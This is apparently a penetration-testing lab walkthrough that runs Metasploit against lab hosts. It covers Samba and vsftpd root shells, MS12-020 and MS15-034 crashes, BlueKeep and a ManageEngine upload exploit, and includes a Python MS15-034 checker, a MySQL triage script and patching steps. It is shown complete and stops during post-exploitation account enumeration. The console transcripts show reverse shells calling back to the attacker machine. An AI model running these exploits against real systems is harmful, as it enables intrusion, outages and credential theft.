1 Auxiliary modules
1.1 Tasks
1) Scan the Tomcat web service version
2) Enumerate MySQL users and server settings
3) HTTP directory scan
4) MS12-020 vulnerability scan
1.2 Steps
Work through this case in the following steps.
Step 1: Scan the Tomcat web service version
msf6 > search tomcat_admin

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_administration                   normal  No     Tomcat Administration Tool Default Access

msf6 > use 0
msf6 auxiliary(admin/http/tomcat_administration) > set rhosts 192.168.10.143
rhosts => 192.168.10.143
msf6 auxiliary(admin/http/tomcat_administration) > run

[*] http:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The module tries the default credentials of the Tomcat administration webapp and reports the URL it tested along with the result; the result line above is cut off in this transcript.
Step 2: Enumerate MySQL users and server settings
msf6 > search mysql_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_enum                   normal  No     MySQL Enumeration Module

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_enum

msf6 > use 0
msf6 auxiliary(admin/mysql/mysql_enum) > set rhosts 192.168.10.143
rhosts => 192.168.10.143
msf6 auxiliary(admin/mysql/mysql_enum) > set username root
username => root
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.10.143

[*] 192.168.10.143:3306 - Running MySQL Enumerator...
[*] 192.168.10.143:3306 - Enumerating Parameters
[*] 192.168.10.143:3306 - MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.10.143:3306 - Compiled for the following OS: debian-linux-gnu
[*] 192.168.10.143:3306 - Architecture: i486
[*] 192.168.10.143:3306 - Server Hostname: metasploitable
[*] 192.168.10.143:3306 - Data Directory: /var/lib/mysql/
[*] 192.168.10.143:3306 - Logging of queries and logins: OFF
[*] 192.168.10.143:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.10.143:3306 - Loading of local files: ON
[*] 192.168.10.143:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.10.143:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.10.143:3306 - Allow Table Merge: YES
[*] 192.168.10.143:3306 - SSL Connections: Enabled
[*] 192.168.10.143:3306 - SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.10.143:3306 - SSL Key: /etc/mysql/server-key.pem
[*] 192.168.10.143:3306 - SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.10.143:3306 - Enumerating Accounts:
[*] 192.168.10.143:3306 - List of Accounts with Password Hashes:
[+] 192.168.10.143:3306 - User: debian-sys-maint Host: Password Hash:
[+] 192.168.10.143:3306 - User: root Host: % Password Hash:
[+] 192.168.10.143:3306 - User: guest Host: % Password Hash:
[*] 192.168.10.143:3306 - The following users have GRANT Privilege:
[*] 192.168.10.143:3306 - User: debian-sys-maint Host:
[*] 192.168.10.143:3306 - User: root Host: %
[*] 192.168.10.143:3306 - User: guest Host: %
[*] 192.168.10.143:3306 - The following users have CREATE USER Privilege:
[*] 192.168.10.143:3306 - User: root Host: %
[*] 192.168.10.143:3306 - User: guest Host: %
[*] 192.168.10.143:3306 - The following users have RELOAD Privilege:
[*] 192.168.10.143:3306 - User: debian-sys-maint Host:
[*] 192.168.10.143:3306 - User: root Host: %
[*] 192.168.10.143:3306 - User: guest Host: %
[*] 192.168.10.143:3306 - The following users have SHUTDOWN Privilege:
[*] 192.168.10.143:3306 - User: debian-sys-maint Host:
[*] 192.168.10.143:3306 - User: root Host: %
[*] 192.168.10.143:3306 - User: guest Host: %
[*] Auxiliary module execution completed
Only username was set, so the module logged in as root with an empty password; that matches the empty Password Hash field of every account it listed. root and guest accept logins from any host (%) and hold GRANT, CREATE USER, RELOAD and SHUTDOWN, query and login logging is off, and LOAD DATA LOCAL is accepted. Anyone who can reach port 3306 owns this database server.
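To turn that listing into findings instead of reading it by eye, here is an added example (written for this page; it is not part of the lab and not a Metasploit component) that parses the mysql_enum output format and flags the conditions just described: empty hashes, accounts reachable from %, the privileges each holds, the local_infile, logging and symlink settings, and the end-of-life 5.0 branch. SAMPLE_OUTPUT is constructed from the transcript above; the debian-sys-maint host and hash in it are placeholders, not values from the lab.

```python
"""Triage Metasploit mysql_enum output into findings (added example, not lab code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample modelled on the lab transcript. The debian-sys-maint host and
# hash are made-up placeholders; the other lines mirror the page.
SAMPLE_OUTPUT = """\
[*] 192.168.10.143:3306 - Running MySQL Enumerator...
[*] 192.168.10.143:3306 - MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.10.143:3306 - Logging of queries and logins: OFF
[*] 192.168.10.143:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.10.143:3306 - Loading of local files: ON
[*] 192.168.10.143:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.10.143:3306 - List of Accounts with Password Hashes:
[+] 192.168.10.143:3306 - User: debian-sys-maint Host: localhost Password Hash: *0000000000000000000000000000000000000000
[+] 192.168.10.143:3306 - User: root Host: % Password Hash:
[+] 192.168.10.143:3306 - User: guest Host: % Password Hash:
[*] 192.168.10.143:3306 - The following users have GRANT Privilege:
[*] 192.168.10.143:3306 - User: root Host: %
[*] 192.168.10.143:3306 - User: guest Host: %
[*] 192.168.10.143:3306 - The following users have SHUTDOWN Privilege:
[*] 192.168.10.143:3306 - User: debian-sys-maint Host: localhost
[*] 192.168.10.143:3306 - User: root Host: %
[*] Auxiliary module execution completed
"""

PREFIX = re.compile(r"^\[[*+!-]\]\s+\S+\s+-\s+(.*)$")          # "[*] host:port - body"
PRIV_HDR = re.compile(r"^The following users have (?P<priv>.+?) Privilege:$")
ACCOUNT = re.compile(
    r"^User:\s*(?P<user>\S+)\s+Host:\s*(?P<host>(?!Password\s+Hash:)\S*)"
    r"\s*(?:Password Hash:\s*(?P<hash>\S*))?$")
SETTING = re.compile(r"^(?P<key>.*?):?\s+(?P<val>ON|OFF|YES|NO|ENABLED|DISABLED)$", re.I)


@dataclass
class EnumResult:
    version: Optional[str] = None
    settings: Dict[str, str] = field(default_factory=dict)
    accounts: Dict[Tuple[str, str], str] = field(default_factory=dict)     # (user, host) -> hash, '' = none
    privileges: Dict[Tuple[str, str], Set[str]] = field(default_factory=dict)


def parse_mysql_enum(text: str) -> EnumResult:
    """Walk the module output line by line, tracking which privilege section we are in."""
    res = EnumResult()
    current_priv = None
    for raw in text.splitlines():
        m = PREFIX.match(raw.strip())
        if not m:
            continue
        body = m.group(1).strip()
        if body.startswith("MySQL Version:"):
            res.version = body.split(":", 1)[1].strip()
            continue
        pm = PRIV_HDR.match(body)
        if pm:
            current_priv = pm.group("priv").upper()
            continue
        am = ACCOUNT.match(body)
        if am:
            key = (am.group("user"), am.group("host"))
            if am.group("hash") is not None:          # line from the hash listing
                res.accounts[key] = am.group("hash")
                current_priv = None
            elif current_priv:                         # line inside a privilege section
                res.privileges.setdefault(key, set()).add(current_priv)
            continue
        sm = SETTING.match(body)
        if sm:
            res.settings[sm.group("key").strip()] = sm.group("val").upper()
            current_priv = None
    return res


def triage(res: EnumResult) -> List[str]:
    """Return one human-readable finding per weak account or risky server setting."""
    findings = []
    for (user, host), pw_hash in sorted(res.accounts.items()):
        privs = ", ".join(sorted(res.privileges.get((user, host), ()))) or "none listed"
        issues = []
        if pw_hash == "":
            issues.append("empty password")
        elif len(pw_hash) == 16:
            issues.append("pre-4.1 16-character hash (old_passwords)")
        if host == "%":
            issues.append("login allowed from any host")
        if issues:
            findings.append(f"{user}@{host}: " + "; ".join(issues) + f" (privileges: {privs})")
    if res.settings.get("Loading of local files") == "ON":
        findings.append("local_infile is ON (LOAD DATA LOCAL accepted); set local_infile=0 unless required")
    if res.settings.get("Logging of queries and logins") == "OFF":
        findings.append("query/login logging is OFF: enumeration and password guessing leave no server-side trace")
    if res.settings.get("Allow Use of symlinks for Database Files") == "YES":
        findings.append("symbolic links for database files allowed; start mysqld with --skip-symbolic-links")
    if res.version and res.version.startswith("5.0"):
        findings.append(f"MySQL {res.version}: the 5.0 branch is end-of-life and receives no security fixes")
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OUTPUT
    for line in triage(parse_mysql_enum(text)):
        print("[!]", line)
```

Pipe a saved msfconsole transcript in as the first argument (or use `spool` in msfconsole to capture one); the parser ignores every line that is not in the module's "host:port - " format, so the search table and prompts do not confuse it.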
Step 3: HTTP directory scan
msf6 > search dir_scanner

Matching Modules
================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/dir_scanner                   normal  No     HTTP Directory Scanner

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/dir_scanner

msf6 > use 0
msf6 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.10.143
rhosts => 192.168.10.143
msf6 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.10.143
[+] Found http:
[+] Found http:
[+] Found http:
[+] Found http:
[+] Found http:
[+] Found http:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
dir_scanner first requests a random path to learn what this server returns for a missing resource (a plain 404 here) and then reports every wordlist entry that answers differently; the six URLs it found are truncated in this transcript. Set DICTIONARY to use a wordlist other than the built-in one.
Step 4: MS12-020 vulnerability scan
msf6 > search ms12-020

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   1  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rdp/ms12_020_check

msf6 > use 1
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 192.168.10.145:3389 - 192.168.10.145:3389 - The target is vulnerable.
[*] 192.168.10.145:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the checker (index 1), not the DoS (index 0), when you only want to know whether the host is patched: the checker is non-destructive, the DoS module crashes the target and is the one used in section 2 below.
2 Exploit modules
2.1 Tasks
1) Exploit the SMB service (Samba "username map script")
2) Exploit the VSFTPD backdoor
3) PHP argument injection (listed here, but no step for it appears below)
4) RDP vulnerability (MS12-020; Metasploit only carries a denial-of-service module for it, not remote command execution)
2.2 Steps
Work through this case in the following steps.
Step 1: Exploit the SMB service
msf6 > search CVE-2007-2447

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.10.143
rhosts => 192.168.10.143
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.10.136:4444
[*] Command shell session 1 opened (192.168.10.136:4444 -> 192.168.10.143:58125) at 2021-03-23 21:17:35 +0800

pwd
/

whoami
root
CVE-2007-2447 affects Samba 3.0.20 through 3.0.25rc3 when smb.conf sets "username map script": the username from the session setup is passed to that script through a shell without escaping, so shell metacharacters in the username run commands. The payload defaulted to cmd/unix/reverse_netcat with LHOST taken from the attacker's interface (192.168.10.136), and the shell is root because smbd runs as root and the injected command inherits that.
Step 2: Exploit the VSFTPD backdoor
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
rhosts => 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.10.143:6200) at 2021-03-23 21:23:43 +0800

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami
root
This is not a memory-corruption bug but a backdoor planted in the vsftpd 2.3.4 source tarball that was distributed for a few days in 2011: a USER name containing ":)" makes the daemon open a root shell on TCP port 6200. The module sends that username and then connects to 6200 itself, which is why the session shows 0.0.0.0:0 -> 192.168.10.143:6200 instead of a reverse handler, and why the payload is cmd/unix/interact rather than a reverse shell.
Step 3: RDP denial of service (MS12-020)
msf6 > search ms12-020

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   1  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rdp/ms12_020_check

msf6 > use 0
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
[*] Running module against 192.168.10.145

[*] 192.168.10.145:3389 - 192.168.10.145:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.10.145:3389 - 192.168.10.145:3389 - 210 bytes sent
[*] 192.168.10.145:3389 - 192.168.10.145:3389 - Checking RDP status...
[+] 192.168.10.145:3389 - 192.168.10.145:3389 seems down
[*] Auxiliary module execution completed
The attack succeeded: RDP stopped answering and the host went down, as Figure 1 shows. Note what this is and is not: a single 210-byte MCS connect sequence with a malformed maxChannelIds value triggers a use-after-free in the RDP kernel driver and crashes the machine. It is a denial of service, not command execution, and there is no public remote code execution for MS12-020 in Metasploit, so the task heading "RDP remote command execution" in 2.1 overstates it. Only run this against a host you are allowed to take down.
Figure 1
3 HTTP.sys RCE vulnerability (MS15-034 / CVE-2015-1635)
3.1 Tasks
1) Find the HTTP.sys RCE vulnerability in the OpenVAS scan results
2) Attack the Win2008 Server through the vulnerability
- Check the target with a POC script
- Search the msf console for CVE-2015-1635
- Scan the target host with the scanner module
- Once the target is confirmed vulnerable, exploit it
3) Defence
- Disable IIS kernel-mode caching
- Install the system patch
3.2 Steps
Work through this case in the following steps.
Step 1: Check the scan results
Read the vulnerability details and the scanner's analysis.
Figure 2
Step 2: Attack the Win2008 Server through the vulnerability
1) Review the POC check script. The file on the lab machine is Python 2; it is shown here converted to Python 3 with the same two requests and the same three verdicts, so it runs on a current Kali.
┌──(root@localhost)-[~/桌面]
└─# cat cve-2015-1635.poc
import socket
import sys

ipAddr = "192.168.10.145"
# 2**64 - 1 in decimal (the variable name is historical): the upper range bound
# that overflows the length arithmetic in HTTP.sys
hexAllFfff = "18446744073709551615"

req1 = b"GET / HTTP/1.0\r\n\r\n"
req = ("GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n").encode()

print("[*] Audit Started")

# First connection: make sure this is IIS / HTTP.sys before sending the probe
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)

if b"Microsoft" not in boringResp:
    print("[*] Not IIS")
    sys.exit(0)
client_socket.close()

# Second connection: the oversized Range. Unpatched HTTP.sys answers
# 416 Requested Range Not Satisfiable; patched HTTP.sys rejects the header with
# 400 "The request has an invalid header name".
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)

if b"Requested Range Not Satisfiable" in goodResp:
    print("[!!] Looks VULN")
elif b"The request has an invalid header name" in goodResp:
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")
client_socket.close()
┌──(root@localhost)-[~/桌面]
└─# python3 cve-2015-1635.poc
[*] Audit Started
[!!] Looks VULN
2) Search the msf console for CVE-2015-1635
msf6 > search CVE-2015-1635          (search MS15-034 returns the same two modules)
   0  auxiliary/dos/http/ms15_034_ulonglongadd
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump
3) Scan the target host with the scanner module
msf6 > use 1
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run

[+] Target may be vulnerable...
[+] Stand by...
[-] Memory dump start position not found, dumping all data instead

[+] Memory contents:
48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 |HTTP/1.1 400 Bad|
20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e | Request..Conten|
74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d |t-Type: text/htm|
6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 |l; charset=us-as|
63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 |cii..Server: Mic|
72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32 |rosoft-HTTPAPI/2|
2e 30 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 |.0..Date: Mon, 2|
32 20 4d 61 72 20 32 30 32 31 20 30 32 3a 31 33 |2 Mar 2021 02:13|
3a 33 35 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 |:35 GMT..Connect|
69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 |ion: close..Cont|
65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 36 0d |ent-Length: 346.|
0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d |...<!DOCTYPE HTM|
4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 |L PUBLIC "-//W3C|
2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f |//DTD HTML 4.01/|
2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e |/EN""http://www.|
77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f |w3.org/TR/html4/|
73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 |strict.dtd">..<H|
54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 |TML><HEAD><TITLE|
3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 |>Bad Request</TI|
54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 |TLE>..<META HTTP|
2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d |-EQUIV="Content-|
54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 |Type" Content="t|
65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 |ext/html; charse|
74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 |t=us-ascii"></HE|
41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 |AD>..<BODY><h2>B|
61 64 20 52 65 71 75 65 73 74 20 2d 20 52 65 71 |ad Request - Req|
75 65 73 74 20 54 6f 6f 20 4c 6f 6e 67 3c 2f 68 |uest Too Long</h|
32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 |2>..<hr><p>HTTP |
45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 73 |Error 400. The s|
69 7a 65 20 6f 66 20 74 68 65 20 72 65 71 75 65 |ize of the reque|
73 74 20 68 65 61 64 65 72 73 20 69 73 20 74 6f |st headers is to|
6f 20 6c 6f 6e 67 2e 3c 2f 70 3e 0d 0a 3c 2f 42 |o long.</p>..</B|
4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a |ODY></HTML>..|

[+] Memory dump saved to /root/.msf4/loot/20210322101335_default_192.168.10.145_iis.ms15034_994565.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Read the hexdump before calling this a leak. Decoded, it is nothing but the server's own error page ("HTTP Error 400. The size of the request headers is too long."), so no kernel memory came back in this run; the "Memory dump start position not found" line says as much. The "may be vulnerable" verdict comes from the module's preliminary range check, the same 416 response the POC script relies on. The memory read only works against a resource HTTP.sys actually serves from its kernel cache, so point TARGETURI at a static file (an image or the default iisstart.htm) rather than the site root if you want a real dump.
4) The target is vulnerable; exploit it
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > back
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The Win2008 host blue-screens, as Figure 3 shows. Although the bug is rated remote code execution, the only public Metasploit module for it is this denial of service: a Range header with an upper bound of 2^64-1 and a non-zero lower bound makes HTTP.sys miscompute the length of a kernel-cached response (the "ulonglongadd" in the module name is the overflowing addition) and the kernel crashes. Like the MS12-020 module, run it only against a host you are allowed to take down.
Figure 3
Step 3: Defence
1) Disable IIS kernel-mode caching
See Figures 4 and 5. In IIS Manager this is the "Enable kernel cache" box under Output Caching. Clearing it is the workaround Microsoft published for MS15-034, because HTTP.sys only reaches the vulnerable code when it serves a response from its kernel cache; it costs static-content performance and is a stopgap until the patch is on.
Figure 4
Figure 5
2) Install the system patch
Download the patch package Windows6.1-KB3042553-x86.msu from Microsoft, or update through Windows Update. Download page: https://www.microsoft.com/zh-tw/download/details.aspx?id=46501 . Pick the package for the target's architecture: Windows Server 2008 R2 (the "Windows 2008R2" volume label and build 6.1.7601 seen in section 5) exists only as x64, so it needs the x64 package; the x86 package applies to 32-bit Windows 7.
3) Verify the result
See Figures 6 and 7. Re-run the POC script after rebooting; a patched host answers "Looks Patched", and the scanner module no longer reports it as vulnerable.
Figure 6
Figure 7
4 CVE-2019-0708 (BlueKeep) exploitation
4.1 Tasks
1) Find the CVE-2019-0708 modules
2) Attack the Win2008 Server through the vulnerability
3) Defence
4.2 Steps
Work through this case in the following steps.
Step 1: Find and run the checker
1) Find the modules
msf6 > search CVE-2019-0708
   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
2) Scan with the checker
msf6 > use 0
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[+] 192.168.10.145:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.10.145:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The checker asks, in the MCS Connect Initial PDU, to bind the internal MS_T120 virtual channel under a channel index other than the one the server reserves for it. An unpatched host accepts the binding and, when the connection ends, frees the channel object while a reference to it is still in use; that is the use-after-free the exploit builds on, and the cleanup behaviour is what the message above reports. The check itself does not crash the host, which is why the module carries Check = Yes.
Step 2: Attack the Win2008 Server through the vulnerability
1) Switch to the exploit module
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > back
msf6 > use 1
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
2) Set the target host address
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.10.145
3) Set the target
The exploit cannot pick this for you reliably: each entry in `show targets` pairs Windows 7 SP1 / 2008 R2 x64 with the hypervisor the victim runs on (VirtualBox, VMware, Hyper-V and others), because the kernel pool address used for grooming differs between them. Target 4 is the VMware 15 entry in the module version used here; check `show targets` on yours and pick the entry matching your lab, since a mismatched address crashes the target instead of returning a shell.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.10.136:4444
[*] 192.168.10.145:3389 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.10.145:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.10.145:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.10.145:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.145:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.10.145:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 192.168.10.145:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.10.145:3389 - Surfing channels ...
[*] 192.168.10.145:3389 - Lobbing eggs ...
[*] 192.168.10.145:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.10.145:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Exploit completed, but no session was created.
The attack took effect, as Figure 8 shows, even though no session was created: the use-after-free was triggered but no shell came back. The module is ranked manual for exactly this reason. When the groom address (GROOMBASE, chosen by the target entry) or GROOMSIZE does not match the victim's memory layout, the usual outcome is a kernel crash rather than a meterpreter session, so on a real engagement treat this module as a potential denial of service and agree that risk with the client first.
Figure 8
Step 3: Defence
1) Install the patch, as Figure 9 shows. If the host cannot be patched at once, enable Network Level Authentication or block 3389 from untrusted networks: the bug is reachable before any credentials are presented, and NLA removes that unauthenticated path.
Figure 9
2) Reboot and scan again
See Figure 10. Re-run auxiliary/scanner/rdp/cve_2019_0708_bluekeep against the host; after the patch it must no longer report the target as vulnerable.
Figure 10
5 Desktop management software exploitation (ManageEngine Desktop Central)
5.1 Tasks
1) Find the CVE-2015-8249 module
2) Attack the Win2008 Server through the vulnerability
3) Brute-force the system password
5.2 Steps
Work through this case in the following steps.
Step 1: Find the module
msf6 > search CVE-2015-8249

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/windows/http/manageengine_connectionid_write  2015-12-14       excellent  Yes    ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
Step 2: Exploit it and get a meterpreter session
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_connectionid_write) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 exploit(windows/http/manageengine_connectionid_write) > exploit

[*] Started reverse TCP handler on 192.168.10.136:4444
[*] Creating JSP stager
[*] Uploading JSP stager QJTdv.jsp...
[*] Executing stager...
[*] Sending stage (175174 bytes) to 192.168.10.145
[*] Meterpreter session 1 opened (192.168.10.136:4444 -> 192.168.10.145:49298) at 2021-03-22 12:11:57 +0800
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/QJTdv.jsp' on the target
Desktop Central's FileUploadServlet does not validate its connectionId parameter, so the module uses a path traversal through it to write a JSP stager into the web application and then requests that page to run it; no authentication is needed. Take the cleanup warning seriously: the uploaded JSP stays on the target, runnable by anyone who knows its name, until you delete it.
Step 3: The session is unprivileged; getsystem and hashdump fail
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
The stager runs inside the Desktop Central service, so the session inherits that service's account. LOCAL SERVICE cannot read the SAM, and none of getsystem's techniques worked here, so instead of escalating on the box the lab goes after the accounts directly.
Step 4: Gather system information for a password-guessing attack
meterpreter > shell
Process 2404 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ManageEngine\DesktopCentral_Server\bin>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            anakin_skywalker         artoo_detoo
ben_kenobi               boba_fett                c_three_pio
chewbacca                darth_vader              greedo
Guest                    han_solo                 jabba_hutt
jarjar_binks             kylo_ren                 lando_calrissian
leia_organa              luke_skywalker           sshd
sshd_server              vagrant
The command completed with one or more errors.
C:\ManageEngine\DesktopCentral_Server\bin>dir c:\users
dir c:\users
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 9CAA-5EC4

 Directory of c:\users

10/05/2020  10:31 PM    <DIR>          .
10/05/2020  10:31 PM    <DIR>          ..
03/10/2021  08:17 AM    <DIR>          Administrator
10/05/2020  10:31 PM    <DIR>          Classic .NET AppPool
07/13/2009  09:57 PM    <DIR>          Public
